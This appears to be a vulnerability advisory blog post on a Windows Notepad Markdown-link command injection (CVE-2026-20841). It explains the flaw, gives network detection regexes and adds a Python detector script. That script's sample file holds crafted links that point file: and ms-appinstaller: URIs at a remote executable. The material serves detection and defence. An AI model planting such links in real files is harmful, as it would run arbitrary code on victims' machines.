In this excerpt of a TrendAI Research Services vulnerability report, Nikolai Skliarenko and Yazhi Wang of the TrendAI Research team detail a recently patched command injection vulnerability in the Windows Notepad application. This bug was originally discovered by Cristian Papa and Alasdair Gorniak of Delta Obscura. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim’s account. The following is a portion of their write-up covering CVE-2026-20841, with a few minimal modifications.
A remote code execution vulnerability has been reported in Microsoft Windows Notepad. The vulnerability is due to improper validation of links in Markdown files.
A remote attacker could exploit this vulnerability by enticing the victim to download and interact with a malicious file. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim’s account.
The Vulnerability
Microsoft Windows comes with a default text-editing application called Windows Notepad. Historically, this application offered only minimal editing features. However, modern versions of Windows include an improved and extended Notepad by default. This new version supports multiple file formats, Markdown rendering, and Copilot-enhanced features.
Markdown is a lightweight markup language that allows users to create formatted text using a simple syntax. It is widely used for writing documents, blog posts, and README files. It supports a wide range of formatting options, including (but not limited to) headers, styled text, numbered and bulleted lists, and links. Markdown supports two main link formats: standard and inline. The standard link format is:
[link-name](link/path)
When rendered, only the link text (“link-name”) is shown to the user.
The inline links use the following format:
<link/path>
When rendered, they are transformed into the equivalent standard link:
[link/path](link/path)
A remote code execution vulnerability has been reported in Microsoft Windows Notepad. The vulnerability is due to improper validation of links when handling Markdown files.
When Notepad opens a file, if the application detects that the file requires special rendering (in this case, Markdown), the input file is tokenized. Tokenization in this context means splitting the raw file text into a sequence of small, recognizable pieces (“tokens”) that the renderer can process one by one. Detection is based on the file extension: only the “.md” extension was found to trigger Markdown rendering, because the application decides whether Markdown should be rendered using a fixed string comparison, performed by calling sub_1400ED5D0(). Markdown files are rendered token by token.
Function sub_140170F60() handles clicking on links in Markdown files. It filters the link value and passes it to the ShellExecuteExW() call.
The filtering performed on the link is found to be insufficient, as it allows maliciously crafted protocol URIs, such as “file://” and “ms-appinstaller://”, to execute arbitrary files in the security context of the victim. ShellExecuteExW() uses the configured protocol handlers and may expose additional exploitable protocols depending on the system configuration.
A remote attacker could exploit this vulnerability by enticing the victim to download a maliciously crafted Markdown file, open it, and click on a malicious link. Successful exploitation of this vulnerability could result in the execution of arbitrary commands in the security context of the victim’s account.
Notes
• Files using the “.md” file extension are not registered to be opened by Notepad by default. However, when opened manually in Notepad, they are rendered as Markdown, which allows the vulnerability to be triggered.
• Any “\\” sequences are converted to “\” in the attacker-controlled link path prior to passing it to the ShellExecuteExW() call.
Source Code Walkthrough
The following code snippet was taken from Notepad.exe version 11.2508. Comments added by TrendAI researchers have been highlighted.
In sub_140170F60():
Detection Guidance
To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the following application protocols that can be used to deliver an attack to exploit this vulnerability:
• FTP, over ports 21/TCP, 20/TCP
• HTTP, over port 80/TCP
• HTTPS, over port 443/TCP
• IMAP, over port 143/TCP
• NFS, over ports 2049/TCP, 2049/UDP, 111/TCP, 111/UDP
• POP3, over port 110/TCP
• SMTP, over ports 25/TCP, 587/TCP
• SMB/CIFS, over ports 139/TCP, 445/TCP
The detection device must inspect traffic transferring a Markdown file with the file extension “.md”. If such a file transfer is found, the detection device must search the file content for links.
The detection device must check whether the link paths contain the strings “file:” or “ms-appinstaller:”.
If “file:” was found, the detection device must search the Markdown file contents using the following case-insensitive regular expression:
(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
If “ms-appinstaller:” was found, the detection device must search the Markdown file contents using the following case-insensitive regular expression:
(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
If any of the regular expressions matches, the link contains a path to a remote resource. The traffic must be considered malicious; an attack exploiting this vulnerability is likely underway. This guidance should also detect the public PoC that was recently posted on GitHub.
Notes
• The string matches are case-insensitive.
• The detection guidance is based on the vendor-provided patch. However, the patch restricts the links to local-only files and HTTP(S) URIs, and matching that restriction directly would produce a huge number of false positives. Because of that, the detection guidance focuses on link formats that may access and execute remote files, which in turn may result in false negatives.
• The vulnerable function uses the configured protocol handlers and may expose additional exploitable protocols depending on the system configuration.
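The following script is an added example, not part of the TrendAI write-up or of Notepad's own code. It ties together the two Markdown link forms described earlier (standard `[name](target)` and inline `<target>`, which is normalised to the standard form), the doubled-backslash note, and the detection guidance above: the two guidance regexes are run over the raw file text as a network sensor would, and a separate scheme allowlist reconstructs the local-file/HTTP(S)-only policy the report attributes to the patch. The allowlist logic, the sample Markdown file, and the host names in it are the editor's assumptions and constructed test data.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# The two detection regexes from the guidance above (case-insensitive). Each
# anchors on the start of a Markdown link, "<" for the inline form or "[text]("
# for the standard form, then requires a file: or ms-appinstaller: URI whose
# path begins with enough "/" or doubled-backslash separators to name a remote resource.
LINK_PREFIX = r"(\x3C|\[[^\x5d]+\]\()"
FILE_REMOTE_RE = re.compile(LINK_PREFIX + r"file:(\x2f|\x5c\x5c){4}", re.IGNORECASE)
APPINSTALLER_REMOTE_RE = re.compile(
    LINK_PREFIX + r"ms-appinstaller:(\x2f|\x5c\x5c){2}", re.IGNORECASE)

# The two link forms the report describes: [name](target) and <target>.
STANDARD_LINK_RE = re.compile(r"\[([^\]]+)\]\(([^)\s]+)\)")
INLINE_LINK_RE = re.compile(r"<([^<>\s]+)>")


@dataclass
class Link:
    name: str
    target: str


def extract_links(markdown: str) -> list[Link]:
    """Collect both link forms; an inline <target> is normalised to [target](target)."""
    links = [Link(m.group(1), m.group(2)) for m in STANDARD_LINK_RE.finditer(markdown)]
    links += [Link(m.group(1), m.group(1)) for m in INLINE_LINK_RE.finditer(markdown)]
    return links


def unescape_backslashes(target: str) -> str:
    # Mirror the report's note: a doubled backslash in the link collapses to a single one.
    return target.replace("\\\\", "\\")


def detect_remote_resource_links(markdown: str) -> list[str]:
    """Run the guidance regexes over the raw file text; return the names of matching rules."""
    hits = []
    if FILE_REMOTE_RE.search(markdown):
        hits.append("file-remote")
    if APPINSTALLER_REMOTE_RE.search(markdown):
        hits.append("ms-appinstaller-remote")
    return hits


def file_uri_is_local(target: str) -> bool:
    """True only for file: URIs that name a path on this machine (editor's reconstruction)."""
    rest = unescape_backslashes(target)[len("file:"):].replace("\\", "/")
    if not rest.startswith("//"):
        return True                      # file:C:/x or file:/C:/x
    host, _, tail = rest[2:].partition("/")
    if host.lower() in ("", "localhost"):
        # file:///C:/x is local, but file:////server/share hides a UNC host in the path
        return not tail.startswith("/")
    return False                         # explicit remote host


def is_allowed_link(target: str) -> bool:
    """Scheme allowlist modelled on the patch as the report describes it (local files
    and HTTP(S) only). Assumption: this is the editor's defensive reconstruction, not
    Microsoft's code; every scheme not listed is refused."""
    scheme, sep, _ = target.partition(":")
    if not sep or len(scheme) <= 1:
        return True                      # relative path or bare drive letter, treated as local
    scheme = scheme.lower()
    if scheme in ("http", "https"):
        return True
    if scheme == "file":
        return file_uri_is_local(target)
    return False


def triage(markdown: str) -> dict:
    """Combine both views: sensor-style rule hits and per-link allowlist decisions."""
    blocked = [link.target for link in extract_links(markdown) if not is_allowed_link(link.target)]
    return {"rule_hits": detect_remote_resource_links(markdown), "blocked_targets": blocked}


# Constructed sample file; the hosts and paths are invented, not taken from the report or PoC.
SAMPLE_MARKDOWN = r"""# Release notes

See the [project page](https://example.test/docs) and <https://example.test/changelog>.
Open the [local readme](file:///C:/Users/Public/readme.txt).
[Get the update](file:////share.example.test/public/update.exe)
[Same, escaped](file:\\\\\\\\share.example.test\\public\\update.exe)
<ms-appinstaller://share.example.test/pkg/app.msixbundle>
"""

if __name__ == "__main__":
    print(triage(SAMPLE_MARKDOWN))
```

The two views deliberately disagree at the edges, as the report's notes warn: the regexes never flag `file:///C:/...` or plain `https://` links (no false positives on ordinary documents), while the allowlist refuses every scheme it does not know, including ones the regexes do not cover. The escaped sample line exists because the rule must count doubled backslashes in the file, since Notepad halves them before the path reaches ShellExecuteExW().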
Conclusion
This vulnerability was patched by Microsoft in the February 2026 release cycle. They note no workarounds but do list user interaction as a prerequisite to exploitation. To fully remediate the vulnerability, the proper action is to test and deploy the provided vendor patch.
Special thanks to Nikolai Skliarenko and Yazhi Wang of the TrendAI Research team for providing such a thorough analysis of this vulnerability. For an overview of TrendAI Research services please visit https://go.trendmicro.com/tis/vulnerabilities.html.
The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
Read More – Zero Day Initiative – Blog